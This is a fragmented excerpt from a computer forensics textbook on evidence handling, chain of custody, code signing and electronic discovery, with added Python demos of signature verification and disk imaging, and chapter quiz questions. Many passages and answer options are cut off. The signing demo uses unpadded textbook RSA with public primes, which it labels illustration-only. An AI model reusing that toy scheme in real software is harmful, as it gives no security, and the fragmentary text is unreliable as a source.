A key to establishing that a user has no right to privacy when
using corporate networks or computer systems is the implementation of a log-on
banner
...
Individuals using this computer
system without authority, or in excess of their authority, are subject to having all
of their activities on this system monitored and recorded by system personnel
...
Anyone using this system expressly consents to such monitoring and is advised
that if such monitoring reveals possible evidence of criminal activity, system personnel may provide the evidence of such monitoring to law enforcement officials
...
The Supreme Court ruling in O’Connor v
...
S
...
To prove that the policy has
been communicated, employees should sign a statement indicating that they have
read, understood, and agreed to comply with corporate policy and consent to system monitoring
...
Tensions will probably be high and people will want to find answers as quickly as possible
...
The investigation team will need to bring certain tools with them to the incident site
...
Depending on the type of incident and whether the team will be able to retrieve an entire system or just the data,
they may also need to bring tools to produce reliable copies of electronic evidence,
including media to use in the copying process
...
If this is something
your legal counsel wants as part of the evidence, then also include a Polaroid camera in the list of tools
...
When an incident is reported, this individual will contact the other members of the
response team as outlined in the Incident Response Policy
...
The incident coordinator will also assign
team members the various tasks outlined in the incident-handling procedure and
will serve as the liaison to the legal team, law enforcement officials, management,
and public relations personnel
...
One team member will be assigned the task of maintaining the evidence notebook
...
At a minimum, items to be recorded in the notebook include
Who initially reported the suspected incident along with time, date, and circumstances surrounding the suspected incident
...
Names of all persons conducting the investigation
...
Reasons for the investigation
...
Also include identification tag numbers assigned to
the systems or individual parts of the system
...
Applications running on the computer systems previously listed
...
A list of administrators responsible for the routine maintenance of the system
...
Specifically,
this list needs to identify the date and time each task was performed, a description of the task, who performed the task, where the task was performed, and the
results of the analysis
...
A separate notebook should be used for each investigation
...
It should be bound in such a way that it is obvious if
a page or pages have been removed
...
Therefore,
it must be as detailed as possible to assist in maintaining this chain
...
To avoid confusion, the number of people assigned this task should be
kept to a minimum
...
This person will tag all evidence and work with the
person responsible for the evidence notebook to ensure that this information is
properly recorded
...
The data will include complete copies of drives on compromised or suspect systems, as well as all relevant log files
...
A simple file copy is not sufficient to serve as evidence in the case of compromised
or suspect systems
...
A reliable copy process has three critical characteristics
...
This includes the software used to create the copy and the media on which the copy is made
...
Second, the copies
must be capable of independent verification
...
Two copies of the data should be made using an acceptable tool
...
One copy will be used for analysis and the
other copy can be put back in the system so the system can be returned to service
as quickly as possible
...
The investigation coordinator will work with the legal
team to determine the requirements for a given case
...
A detailed description of how data was transported and who was responsible for the transport, along with date, time, and route, should be included in
the log
...
Storage and Analysis of Data
Finally, the chain of custody must be maintained throughout the analysis process
...
If the corporation uses access control cards or video surveillance in other parts of the building,
consider using these devices in the forensics lab
...
The video
cameras will help determine what they did once they were inside the lab
...
It is important that evidence never
be left in an unsecured area
...
Pieces of evidence should be grouped and stored by case along with the evidence notebook
...
A detailed plan will help prevent mistakes
(which could lead to the evidence becoming inadmissible) during analysis
...
The following should be included at a minimum:
The date and time of analysis
Tools used in performing the analysis
Detailed methodology of the analysis
Results of the analysis [6]
Again, the information recorded in the evidence notebook must be as detailed
as possible to demonstrate its trustworthiness
...
R
...
803(6)), to such a degree that a court will sustain, or at least consider, a challenge to the admissibility of the evidence
...
Finally, once all evidence has been analyzed and all results have been recorded
in the evidence notebook, a copy of the notebook should be made and given to the
legal team
...
Legal officials should provide a receipt detailing all of the items received for entry into evidence
...
As a result, the world changed from analog to digital
...
An entire constellation of audio, video, communications,
and photographic devices are becoming so closely associated with the computer as
to have converged with it
...
The connectivity resulting from a single world economy, in which the companies providing goods and services are truly international, has enabled criminals
to act transjurisdictionally with ease
...
This situation requires that all nations have the ability to collect and preserve
digital evidence for their own needs as well as for the potential needs of other sovereigns
...
Though it is not reasonable to
expect all nations to know about and abide by the precise laws and rules of other
countries, a means that will allow the exchange of evidence must be found
...
Conclusions
The laws surrounding the collection and preservation of evidence are vast and
complex
...
A clearly documented plan is essential for an investigation team to be successful in collecting admissible evidence
...
Once a plan has been drafted and the incident team is assembled, practice
should begin
...
Treat the intrusion as an actual incident and follow incident handling and evidence collection procedures
...
When possible, include legal staff and local law enforcement in practice sessions
...
If resident security staff members are not equipped to perform the investigation, do not hesitate to bring in outside assistance
...
The goal is to collect and preserve evidence in such a way that it will be admissible in a court of law
...
1 in Appendix F), the computer forensics specialist (CFS) should adhere
to the provisional list of actions for duplication and preservation of digital evidence
...
A number of these systems have been
mentioned in passing already
...
The answers and solutions by chapter can be found in Appendix E
...
True or False? The computer investigator needs to be worried about destructive
process and devices being planted by the computer owner but does not need to
be concerned about the operating system of the computer and applications
...
True or False? Computer evidence is fragile by its very nature and the problem
is compounded by the potential of destructive programs and open data
...
True or False? Some of the least common reasons for improper evidence collection are poorly written policies, lack of an established incident response
plan, lack of incident response training, and a broken chain of custody
...
True or False? The complexity of criminal law means that the overwhelming
majority of cases do not make it to civil or criminal court, but should
...
True or False? If your preservation is good, it becomes fairly evident that your
collection and transportation of evidence gives rise to numerous possibilities
for error in the form of destruction, mishandling, and contamination
...
There are three criminal evidence rules to gain admissibility, except for two:
A
...
Mishandling
C
...
The best evidence rule
E
...
The following general computer evidence processing steps have been provided,
except:
A
...
B
...
C
...
D
...
E
...
3
...
Turn on or operate the subject computer
...
Don’t turn on or operate the subject computer
...
Don’t solicit the assistance of the resident “computer expert
...
Solicit the assistance of the resident “computer expert
...
Don’t evaluate employee email unless corporate policy allows it
...
Preserving a chain of custody for electronic evidence, at a minimum, requires
proving that, except:
A
...
B
...
C
...
D
...
E
...
5
...
This person will record the who, what, where, when, and how of the
investigation process
...
Who initially declined to report the suspected incident along with time,
date, and circumstances surrounding the suspected incident
B
...
Names of all persons conducting the investigation
D
...
Reasons for the investigation
Exercise
Downsizing and outsourcing overseas at a large U.S. government contractor resulted in
the termination of 500 engineers
...
He is now suing the company for millions for
being wrongly accused, which resulted in tarnishing his reputation and his standing in the community
...
What did the CFS do to prove
that the computer was involved in other crimes?
Optional Team Case Project
A small landscaping company suspecting embezzlement hired a CFST to review
their bookkeeper’s computer
...
REFERENCES
[1] “Digital Evidence Collection & Handling” (© North Carolina Wesleyan
College), North Carolina Wesleyan College, 3400 N
...
[2] “Computer Evidence Processing Steps,” New Technologies, Inc
...
, Gresham, Oregon 97030, 2001
...
, Net Privacy: A Guide to Developing and Implementing an
Ironclad E-Business Privacy Plan, McGraw-Hill Professional, New York,
2001
...
, 2075
NE Division St
...
[5] Vacca, John R
...
[6] Witter, Franklin, “Legal Aspects of Collecting and Preserving Computer
Forensics Evidence,” Branch Banking & Trust, 2501 Wooten Blvd
...
, Suite 1501, Bethesda, MD 20816), 2001
...
Although these
procedures are extremely effective under the current rules of evidence, it is expected that alternative procedures will develop as technology advances
...
One of these is sealed
in the presence of the computer owner and then placed in secure storage
...
If the computer has been seized and held in secure storage by law
enforcement, this will constitute best evidence
...
In either case, the assumption is that
while in secure storage, there can be no possibility of tampering with the evidence
...
A growing practical problem with this method of evidential copying occurs not
because of the security aspect or appearance of the situation, but because of the increasing sizes of fixed disks found in computers
...
The cost of the media is decreasing slowly, but this is still significant when considering the quantity of information to be copied and stored (even though the system does
allow for media reuse)
...
A sizable saving in both time and expense might, therefore, be achieved if an alternative method of evidential security could be arranged
...
These display varying degrees of security and complexity, but all of them rely on a second channel of information,
whereby certain elements of the encryption/decryption/authentication processes
are kept secret
...
Consider the investigative process where computers are concerned
...
It may
be possible to seize or impound the computer system, but this risks violating the
basic principle of innocent until proven guilty, by depriving an innocent party of the
use of his or her system
...
When this is done, the courts may rightly insist that the copied evidence is protected from either accidental or deliberate modification and that the investigating
authority should prove that this has been done
...
This protection takes two forms: a secure method of determining that the data
has not been altered by even a single bit since the copy was taken and a secure method
of determining that the copy is genuinely the one taken at the time and on the computer in question
...
It is argued that when considering forensic copies of computer contents, encryption of data is not the point at issue
...
DIGITAL IDS AND AUTHENTICATION TECHNOLOGY
When customers buy software in a store, the source of that software is obvious
...
These factors enable customers to make decisions about what software
to purchase and how much to “trust” those products
...
The Internet lacks
the subtle information provided by packaging, shelf space, shrink wrap, and the like
...
It’s difficult to make the choice of downloading the software from the Internet
...
When
customers download software signed with Authenticode and verified by VeriSign,
they should be assured of content source, indicating that the software really comes
from the publisher who signed it, and content integrity, indicating that the software
has not been altered or corrupted since it was signed
...
Authenticode from Microsoft and Digital IDs from
VeriSign are mentioned here for illustration purposes only
...
In the extreme case
that software performs unacceptable or malicious activity on their computers, users
can pursue recourse against the publisher
...
Developers and Webmasters should benefit from Authenticode, because it puts
trust in their name and makes their products harder to falsify
...
With
Authenticode, users can make educated decisions about what software to download,
knowing who published the software and that it hasn’t been tampered with
...
For example, Authenticode is currently used to sign 32-bit
...
cab files,
...
class files
...
VeriSign offers a Class 3 Digital ID designed for commercial software publishers
...
This class
of digital IDs provides the identity of a publishing organization and is designed to
represent the level of assurance provided today by retail channels for software
...
These
applications are often used to obtain other pieces of software
...
For example, when a user visits a Web page that uses executable files to
provide animation or sound, code is often downloaded to the end user’s machine to
achieve the effects
...
If an end user of one of these applications encounters an unsigned component
distributed via the Internet, the following will occur: if the application’s security settings are set on High, the client application will not permit the unsigned code to
load; if the application’s security settings are set on Medium, the client application
will display a warning similar to the screen shown in Figure 8
...
FIGURE 8
...
Computer Image Verification and Authentication
By contrast, if a user encounters a signed applet or other code, the client application will display a screen similar to the one shown in Figure 8
...
Through
Authenticode, the user is informed:
FIGURE 8
...
Of a place to find out more about the control
The authenticity of the preceding information
Users can choose to trust all subsequent downloads of software from the same
publisher
...
Simply by
clicking the More Info button, users can inspect the certificate and verify its validity,
as shown in Figure 8
...
TECHNICAL OVERVIEW
A digital ID (also known as a digital certificate) is a form of electronic credentials for
the Internet
...
The third party who issues certificates is known as a certification authority (CA)
...
In public key cryptography systems, every entity has two complementary keys (a public key
and a private key) that work as a pair: what one key signs, only the other can verify
...
Any code digitally signed with the publisher’s private key can only be successfully verified using the complementary public key
...
3 Inspect the certificate and verify its validity
...
The purpose of a digital ID is to reliably bind a public key to its owner; the matching
private key stays with the owner and never appears in the certificate
...
Just as when a government issues you a passport, it is
officially vouching for the fact that you are who you say you are
...
CERTIFICATION AUTHORITIES
CAs such as VeriSign are organizations that issue digital certificates to applicants whose
identity they are willing to vouch for
...
As the Internet’s leading CA, VeriSign has the following responsibilities:
Publishing the criteria for granting, revoking, and managing certificates
Granting certificates to applicants who meet the published criteria
Managing certificates (enrolling, renewing, and revoking them)
Storing VeriSign’s root keys in an exceptionally secure manner
Verifying evidence submitted by applicants
Providing tools for enrollment
Accepting the liability associated with these responsibilities
Timestamping digital signatures
HOW AUTHENTICODE WORKS WITH VERISIGN DIGITAL IDS
Authenticode relies on industry-standard cryptography techniques such as X.509
...
These are
well-proven cryptography protocols, which ensure a robust implementation of
code-signing technology
...
Authenticode uses digital signature technology to assure users of the origin and
integrity of software
...
To save time, the Authenticode protocols use a cryptographic digest, which is a one-way hash of the document
...
4 [2]
...
FIGURE 8.4 Authenticode: VeriSign Digital ID process (the original code is run through a one-way hash, the hash is signed to produce the signed code, and the recipient recomputes the hash and compares)
1. Publisher obtains a software developer digital ID from VeriSign
...
2. Publisher creates code
3. Using the ...EXE utility, the publisher
   a. ...
   b. Encrypts the hash using his private key
   c. ...
4. The end user encounters the package
...
5. The end user’s browser examines the publisher’s digital ID
...
6. ...
7. ...
8. ... If they are identical, the browser messages that the content has been verified by VeriSign, and the
end user has confidence that the code was signed by the publisher identified
in the digital ID and that the code hasn’t been altered since it was signed
TIMESTAMPING
Because key pairs are based on mathematical relationships that can theoretically be
“cracked” with a great deal of time and effort, it is a well-established security principle that digital certificates should expire
...
However, most software is intended to have a lifetime of
longer than one year
...
Now, when you sign code, a hash
of your code will be sent to VeriSign to be timestamped
...
This code should be trusted [2]
...
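The hash, sign, verify sequence above and the timestamping rule that follows it are easiest to see in code. The following is an added example written for this page; it is not Authenticode, not VeriSign’s process, and uses no real certificate. To run without any library it uses textbook RSA (no padding) over two well-known Mersenne primes, so the "publisher key" is public knowledge and must never be used for anything real; the certificate fields, epoch times, and installer bytes are constructed here, and the timestamp field stands in for the countersignature a timestamping authority would add. It shows that a tampered file fails, that an unstamped signature is rejected once the certificate expires, and that a timestamped signature is still accepted afterwards.

```python
import hashlib

# Constructed publisher key pair: textbook RSA over two Mersenne primes (2^521-1 and
# 2^607-1 are prime). Illustration of the mechanics only; never use such a key.
P = 2**521 - 1
Q = 2**607 - 1
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))

DAY = 86400


def make_certificate(publisher: str, issued: int, lifetime_days: int = 365) -> dict:
    # A certificate binds the publisher's name to the public key for a limited period.
    # (A real one is itself signed by the CA; that layer is omitted here.)
    return {"subject": publisher, "n": N, "e": E,
            "not_before": issued, "not_after": issued + lifetime_days * DAY}


def sign_code(code: bytes, signed_at: int, timestamp: bool) -> dict:
    # Hash first (a 256-bit digest is far smaller than the code), then apply the
    # private key to the digest. The timestamp field stands in for a trusted
    # timestamping authority's countersignature over the signature.
    digest = int.from_bytes(hashlib.sha256(code).digest(), "big")
    sig = {"signature": pow(digest, D, N)}
    if timestamp:
        sig["timestamp"] = signed_at
    return sig


def verify_code(code: bytes, sig: dict, cert: dict, now: int) -> str:
    """Return 'verified', 'tampered' or 'expired'. Signing must have happened while
    the certificate was valid; with a trusted timestamp that moment is known, without
    one only the present time can be used, so an expired certificate fails."""
    digest = int.from_bytes(hashlib.sha256(code).digest(), "big")
    if pow(sig["signature"], cert["e"], cert["n"]) != digest:
        return "tampered"
    when = sig.get("timestamp", now)
    if not (cert["not_before"] <= when <= cert["not_after"]):
        return "expired"
    return "verified"


def demo() -> dict:
    issued = 1_000_000_000                      # constructed epoch times
    cert = make_certificate("Example Software Ltd", issued)
    code = b"MZ\x90\x00 constructed installer bytes"
    signed_at = issued + 30 * DAY
    stamped = sign_code(code, signed_at, timestamp=True)
    unstamped = sign_code(code, signed_at, timestamp=False)
    later = issued + 500 * DAY                  # checked after the certificate expired
    return {
        "fresh": verify_code(code, stamped, cert, signed_at + DAY),
        "tampered": verify_code(code + b"\x90", stamped, cert, signed_at + DAY),
        "after_expiry_unstamped": verify_code(code, unstamped, cert, later),
        "after_expiry_stamped": verify_code(code, stamped, cert, later),
    }


if __name__ == "__main__":
    print(demo())
```

Two things this makes concrete: the signature covers the hash of the whole file, so a single changed byte fails verification; and a timestamp turns "is the certificate valid now?" into "was it valid when the code was signed?", which is why a one-year certificate can vouch for software with a longer lifetime.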
These requirements
were chosen to reflect the experience of computer forensic investigators
...
Forensic data collection should be complete and non-software specific,
thus avoiding software traps and hidden partitioning
...
In operation, it should be as quick and as simple as possible to avoid error
or delay
...
It should be possible for anyone to use a forensic data collection system
with the minimum amount of training
...
Necessary costs and resources should be kept to a minimum [1]
...
For the collection phase
to remain quick and simple, the digital integrity verification and authentication
protocol must not add significantly to the time required for copying, nor should
there be additional (possibly complex) procedures
...
It would add to the cost
and complexity with little increase to security
...
Who is to issue these? Where are they to be stored? How will each individual remember his or her own key? How can misuse of keys be detected?
The digital integrity verification and authentication protocol described in the next
section is virtually a self-contained system
...
However, within the digital integrity
verification and authentication protocol, alternative channels of security are used to
provide a truly secure system, but at much lower cost in time and consumables
...
It must be understood that during the copying process, procedures are
implemented to trap and handle hardware errors, mapping exceptions where necessary
...
This information is stored on each cartridge within
a copy series
...
The remainder (in fact the bulk) of each cartridge contains the information copied from the suspect drive on a sector by sector basis
...
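The sector-by-sector copy with hardware error trapping described above can be sketched in a few dozen lines. The following is an added example, not DIBS or any other product’s code, using Python’s standard library: it reads a constructed "drive" one sector at a time, retries and then zero-fills any sector that cannot be read while recording its number, and produces a manifest with a hash per sector and an overall hash so that a later change to the image can be pinned to the sector it touched. The drive object, sector size, and sample data are assumptions made here.

```python
import hashlib

SECTOR = 512


class FlakyDrive:
    """Constructed stand-in for a suspect drive: some sectors raise on read, as a
    failing disk does. Real acquisition applies the same loop to raw device reads."""
    def __init__(self, data: bytes, bad_sectors):
        self.data, self.bad = data, set(bad_sectors)

    @property
    def sector_count(self) -> int:
        return -(-len(self.data) // SECTOR)

    def read_sector(self, n: int) -> bytes:
        if n in self.bad:
            raise IOError(f"read error at sector {n}")
        return self.data[n * SECTOR:(n + 1) * SECTOR].ljust(SECTOR, b"\x00")


def image_drive(drive, retries: int = 3) -> tuple:
    """Copy every sector in order. An unreadable sector is retried, then written as
    zeros and recorded, so the image keeps its geometry and the gap is documented
    rather than silently skipped. The manifest carries a hash per sector and an
    overall hash so any later change can be localised."""
    image, sector_hashes, bad = bytearray(), [], []
    for n in range(drive.sector_count):
        block = None
        for _ in range(retries):
            try:
                block = drive.read_sector(n)
                break
            except IOError:
                continue
        if block is None:
            block = b"\x00" * SECTOR
            bad.append(n)
        image += block
        sector_hashes.append(hashlib.sha256(block).hexdigest())
    manifest = {"sectors": drive.sector_count, "unreadable": bad,
                "sector_hashes": sector_hashes,
                "image_sha256": hashlib.sha256(image).hexdigest()}
    return bytes(image), manifest


def verify_image(image: bytes, manifest: dict) -> list:
    """Return the sector numbers whose content no longer matches the manifest
    (an empty list means the image is exactly what was acquired)."""
    if hashlib.sha256(image).hexdigest() == manifest["image_sha256"]:
        return []
    return [n for n, h in enumerate(manifest["sector_hashes"])
            if hashlib.sha256(image[n * SECTOR:(n + 1) * SECTOR]).hexdigest() != h]


def demo() -> dict:
    drive = FlakyDrive(bytes(range(256)) * 16, bad_sectors={3})   # 8 sectors, one bad
    image, manifest = image_drive(drive)
    tampered = bytearray(image)
    tampered[5 * SECTOR + 10] ^= 0xFF                              # flip one bit later
    return {"unreadable": manifest["unreadable"],
            "clean": verify_image(image, manifest),
            "tampered": verify_image(bytes(tampered), manifest)}


if __name__ == "__main__":
    print(demo())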
On the one hand, it’s a topic that chief information officers (CIOs) repeatedly cite as one of their most important issues, if not the most important
...
Perhaps that’s because relatively few security breaches
have hit their organizations—and most of those are of the nuisance variety, which
doesn’t cost a lot of hard dollars
...
With that in mind, let’s take a look at why there
isn’t a sense of urgency in implementing image verification and authentication
security considerations
...
Ultimately, with everything changing, the struggle for security is a constant battle
...
Organizations must be constantly vigilant
...
It is expected that the number of vulnerabilities reported in 2002 will be triple the previous year’s number
...
The costs will continue to grow as the world becomes more
interconnected and as the cleverness of those who would cause harm increases
...
cert
...
In 2003, CERT/CC recorded more than 40,000 incidents
...
They study Internet
security vulnerabilities, handle computer security incidents, publish security alerts,
research long-term changes in networked systems, and develop information and
training to help you improve security at your site
...
When 30 computer security experts involved in a spare-time endeavor called The Honeynet Project hooked a typical computer network to
the Internet to see what hackers would do, the network was probed and exploited
in 15 minutes
...
That’s what makes the Honeynet Project different from other kinds of
risk management
...
The biggest
issue most companies face is how to allow users to do everything they need to do to
be efficient from a business standpoint without opening the door to an attack
...
Some take
precautions when employees are being dismissed—quickly removing their network
access, for example
...
Employees can definitely cause problems if they don’t do the right thing
...
Most CIOs view their staff as a
strength in their overall information security program
...
They
have to understand that most business is built on trust, and their role in maintaining that trust is critical
...
Usually it’s not an issue,
because, in the case of a virus outbreak, everybody is affected
...
Some esoteric things, such as virtual private network (VPN) hardware or encrypting
outside communications, are a little harder to sell
...
Non-staff employees can understand it on a gut level, but after all, companies are not the Defense Department—
they don’t make nuclear arms; they roll and distribute stainless steel or other
products
...
CERT/CC encourages technical and business-side people to work together because they will bring different
perspectives to the matter
...
Security is a mindset and a management practice
as much as it is a technology
...
It’s more political than technical
...
You should not try to deal with problems unless
there really are problems
...
Financial institutions have had to conform to the Gramm-Leach-Bliley Act of
1999, which governs these institutions and the privacy of their customer information [3]
...
Financial institutions have to prove that they are securing their members’ information
...
In the past it was
“Show me your vaults, show me your cameras, show me your paper-shredders
...
”
In the end, it’s difficult, perhaps impossible, to measure the return on investment in security, but perhaps that’s the wrong way to think about it
...
You can’t overspend,
really
...
It only takes one time—one hacker getting in
and stealing all your financial data
...
SUMMARY
The overall security of a computer image verification and authentication system
rests in the combination of security measures
...
As well as providing continuity between blocks, this negates the redundancy encountered when copying the type of data found on fixed disks
(quantities of zeroes, ASCII text, and fixed structures)
...
The encryption of the vault, because it only occurs at the end of each section of
the copy, can be accomplished using a secure encryption algorithm
...
In the event of a challenge, one or both envelopes can be opened in
court and verified against each other and the cartridges
...
Image verification and authentication security involves a relatively straightforward risk-management equation (the more security you put in place, the more
onerous it is for end users), and until the technology arrives to make impenetrable
security invisible to end users, it will remain that way
...
However, CIOs aren’t instituting enough of the highprofile risk-assessment measures that would increase awareness of the problem
throughout their corporations
...
Copying directly to CD-ROM is not possible without some buffer drive to enable correct data-streaming; this introduces a number of potential problem
areas both with the increasingly complex hardware and evidential continuity
...
Copying to tape is less expensive, but the viability of data stored for long periods (in many cases years), particularly if unattended, is also extremely suspect
...
Software-copying packages intended for use on nonspecific peripheral storage
devices raise problems of technical support and hardware matching
...
The process of copying fixed disks at BIOS level has enabled DIBS® to avoid
problems with operating systems and access control mechanisms while the
drive restoration process has proven capable of dealing with all currently available operating systems on the PC platform
...
Note that this protection depends on neither how securely the copy cartridges are stored nor the relative security
attending the storage of the floppy disks
...
When it comes to security readiness, company size doesn’t matter
...
Security breaches normally cost larger companies $90,000, compared with
$78,000 for smaller companies
...
Larger companies are also more likely to be hit with a virus than smaller companies and more likely to have their Web sites defaced
...
The role of senior business executives in beefing up security is significant, but
CIOs continue to express concerns about their executives’ approaches to security
...
At the
same time, CIOs don’t seem to be taking all the steps they could or should be
taking to make security a higher priority for their companies
...
Anti-virus software and firewalls are far and away the most frequently deployed
technologies
...
Technologies not yet widely deployed include image verification and authentication, decoy services, risk-assessment software, and public key infrastructure
(PKI) document encryption
...
An Agenda for Action
When completing the Computer Image Verification and Authentication Checklist
(Table F8
...
The order is not significant; however, these are the activities for which the researcher would want to provide a detailed description of procedures, review, and
assessment for ease of use and admissibility
...
Finally, let’s move on to the real interactive part of this chapter: review questions and exercises, hands-on projects, case projects, and optional team case project
...
Computer Image Verification and Authentication
CHAPTER REVIEW QUESTIONS AND EXERCISES
True/False
1
...
2
...
3
...
4
...
5
...
Multiple Choice
1
...
The true identity of the publisher
B
...
The authenticity of the preceding disinformation
D
...
The authenticity of the preceding information
2
...
Publishing the criteria for granting, revoking, and managing certificates
B
...
Managing certificates (enrolling, renewing, and revoking them)
D
...
Verifying evidence submitted by applicants
3
...
The process is outlined by the following, except:
A
...
B
...
C
...
EXE utility
...
The end user encounters the package
...
The end user’s browser examines the publisher’s digital ID
...
4
...
These
requirements were chosen to reflect the experience of computer forensic investigators
...
Forensic data collection should be complete and non-software specific,
thus avoiding software traps and hidden partitioning
...
In operation, it should be as slow and as difficult as possible to avoid
error or delay
...
It should be possible for anyone to use a forensic data collection system
with the minimum amount of training
...
Necessary costs and resources should be kept to a minimum
...
In operation, it should be as quick and as simple as possible to avoid
error or delay
...
Within the current raw data content of the suspect disk drive, a copy is also
taken of the high section of conventional memory (to include any on-board
ROM areas) and the CMOS contents via port access
...
Also stored on each cartridge is a reference area containing copy-specific information such as the following, except:
A
...
Deleting drive serial number
C
...
Exhibit details and reference comments
E
...
The government agency alleged that the company had violated
its agreement and filed a lawsuit
...
Almost all the data resided on backup tapes
...
The company
turned to a CFS team (CFST) to compile the data necessary to meet the discovery
request
...
The irregularities were serious
enough to potentially necessitate a re-stating of earnings
...
They retained a CFST to
conduct large-scale data mining to get to the bottom of the irregularities
...
The bank sent the computer to a CFST for computer forensic examination
...
She was fired from her job for “poor performance” and subsequently sued her ex-boss and the former employer
...
How did the CFST go about conducting the investigation?
REFERENCES
[1] “DIVA Computer Evidence: Digital Image Verification and Authentication,” Computer Forensics UK Ltd, Third Floor, 9 North Street, Rugby, Warwickshire, CV21 2AB, U.K., 2002
...
[3] Vacca, John R.
...
[4] Vacca, John R.
...
Part III
Computer Forensics Analysis
The third part of this book covers the discovery of electronic evidence, identification of data, reconstructing past events, and networks
...
Increasingly important business information is created, stored, and communicated electronically [1]
...
As companies have increased their reliance on their computer systems, lawyers have begun to be aware of the valuable electronic treasures
that are now being kept in these systems and have started aggressively to target electronic data for discovery in all types of litigation cases
...
Plaintiffs’ lawyers have increasingly targeted electronic evidence for a number
of reasons
...
Numerous statutory provisions empower government
officials to enter, inspect, and make copies of records that must be maintained pursuant to various statutes and regulations
...
Many businesses are increasingly
storing the required records in electronic form
...
The government also has access to records for investigatory purposes
...
For example, under the Competition Act, peace officers with, or in exigent circumstances without, a search warrant, may enter the premises, examine records, and
copy or seize them
...
Plaintiffs’ lawyers and government investigators need to develop the knowledge
and skills necessary to take advantage of the information residing in electronic form
...
Lawyers who choose
to ignore these new opportunities could expose themselves to malpractice claims
...
Defensive strategies that should be implemented prior to litigation include a proper document retention program, periodic
purging of magnetic media, and the implementation of a document management
system
...
Now, let’s begin the discussion of electronic document discovery
...
ELECTRONIC DOCUMENT DISCOVERY:
A POWERFUL NEW LITIGATION TOOL
Other than direct testimony by an eyewitness, documentary evidence is probably
the most compelling form of evidence in criminal and civil cases
...
The same is true about documents used to conduct financial transactions
...
Traditional paper documents have been sought in the legal discovery process for hundreds of years in cases involving white collar crime (financial
frauds, embezzlements)
...
Today, judges and attorneys are very familiar with documentary evidence in paper
form
...
In years past, documentary evidence was limited to paper documents
...
Today, documents are rarely typed or handwritten
...
Most professionals rely on personal computers to maintain schedules and to
create their written communications
...
As a result, more documentary evidence exists today than ever before and it exists in a variety of electronically stored formats
...
Many are exchanged over the Internet and are read on the
computer screen
...
The best evidence rules also work differently today, because an exact copy of a computer
file is as good as the original electronic document
...
There is no difference between the
original and an exact copy, which is why a forensic copy is taken bit-for-bit and its hash is compared with that of the original
...
This is especially true for the
creation of documents on a computer word processor
...
The computer user is usually not aware of this situation
...
Most of this data is beyond the reach or knowledge
of the computer user who created the data
...
Lawyers are just beginning
to understand the evidentiary value of computer-related evidence and computer
forensics in the document discovery process
...
These new forms of
documentary evidence have broadened the potential for legal discovery
...
From a computer forensics perspective, computer data is stored at multiple levels
on computer storage media
...
When computer files are deleted, the data is not really deleted; the file system only marks the directory entry and the clusters as free, and the content remains on the media until it is overwritten
...
Government intelligence agencies have relied on these secret computer storage areas for years, but the
word is starting to get out
...
This is especially true in cases involving the theft
of corporate trade secrets and in wrongful dismissal lawsuits
...
A historical perspective helps one understand the evolution of computer forensics and its transition into the new field of electronic document discovery
...
Personal computers
were no longer thought of as toys; almost overnight they were accepted as reliable
business computers because of the IBM endorsement
...
They have also migrated into millions of households, and their popularity exploded during the 1990s
when people discovered the Internet
...
Powerful personal computers are technology workhorses
that increase productivity and provide portability
...
However, essentially all personal computers lack meaningful
security
...
The DOS operating system installed on the original IBM PC was never intended for commercial use
...
As a result, most
popular desktop PCs and notebook computers lack adequate security
...
Some computer forensics specialists regard
electronic document discovery as nothing more than the exploitation of the inherent security weaknesses in personal computers and the Internet
...
You would
also think that individuals who carry secrets on their desktop and notebook computers would be more careful given these inherent security weaknesses
...
It is likely that most
lawyers don’t even understand the potentials for attorney–client information to be
compromised when computer files and data are exchanged with others
...
However, they provide great
benefits to lawyers because of the potentials of electronic document discovery
...
This situation provides the technology savvy attorney with an edge when it comes to document discovery
...
The attorney just needs to understand the potentials and
the new twist in thinking that is required to reap the benefits of electronic document discovery [2]
...
With businesses and individuals relying on computers for data processing, scheduling, and communications, it is possible to discover anything from background information to the “smoking gun” document by investigating what is on
your opponent’s computer systems
...
Because information discovery only deals with logical evidence (electronic data), you can avoid much of the tedium required by search and
seizure to ensure evidence integrity and the chain of custody
...
Finally, for information discovery, where the basics are concerned, the investigator is occupied with safeguarding the chain of custody
...
Backups of
discovered information files are critical to the overall process, and tools such as
revision-control software can be very handy for this task
...
Three basic rules of thumb should act as guides for any information discovery
...
The notable difference between searching for physical evidence and searching
for logical evidence is that in the latter there is much less structure
...
Once information is found, rigorous methods are applied to its handling and
processing
...
Although different in their implementations, these areas share a few
prominent common principles
...
Both approaches require that everything the investigator does be carefully documented
...
Without such a facility, the investigator
will have a difficult (if not impossible) time maintaining the chain of custody
while examining and holding evidence
...
In a venue where law enforcement authorities are investigating a computer
crime, there is a measurable chance that a case could find its way to court
...
Companies loathe being involved in litigation—even in situations where it appears the law is on their side
...
For this reason, much of what the corporate computer fraud
and abuse investigator does is for naught
...
R
...
Most of the computer crime cases handled by the corporate investigator won’t
end up in litigation
...
Because practically any case can turn into a matter for litigation, the corporate investigator needs to treat all cases with a proper and reasonable amount
of attention
...
1 in Appendix F), the computer forensics specialist (CFS) should adhere to the provisional
list of actions for discovery of electronic evidence
...
A number of these systems have been mentioned in passing already
...
The answers and solutions by chapter can be found in Appendix E
...
True or False? Other than direct testimony by an eyewitness, documentary evidence is probably the most compelling form of evidence in criminal and civil
cases
...
True or False? Biometric technology has revolutionized the way you deal with
information and the way you run your businesses
...
True or False? Numerous statutory provisions empower government officials
to enter, inspect, and make copies of records that must be maintained pursuant
to various statutes and regulations
...
True or False? Many businesses are increasingly storing their required records
in hard copy form
...
True or False? CPAs representing parties with large amounts of electronic data
need to understand that their clients’ data will be targeted for such discovery
and need to advise their clients on how to prepare
...
Under the Competition Act, peace officers with, or in exigent circumstances
without, a search warrant, may do the following, except:
A
...
Examine records
C
...
Seize records
E
...
In recent times, documentary evidence has become the keystone in civil cases
involving the following, except:
A
...
Sexual discrimination
C
...
Stock options
E
...
It is becoming more common for lawyers to seek production of the following,
except:
A
...
C
...
E
...
Since their introduction, IBM PCs and compatible computers have evolved
into the following, except two:
A
...
Powerful calculators
C
...
Desktop computers
E
...
As a result, most popular desktop PCs and notebook computers lack adequate
security
...
Computer files
B
...
Added files
D
...
Erased files
Exercise
A patient with a heart ailment was transported to a hospital where an angiogram
was performed
...
A third angiogram was performed
immediately after the patient’s death
...
The day following the patient’s
death, hospital staff were able to locate images for the first and third angiograms
but could not find any images of the second procedure
...
The plaintiffs also
claimed the defendants had deliberately deleted the images of the second angiogram that allegedly proved the wrongful death claim
...
Explain the possible actions that the CFST
took to locate the images
...
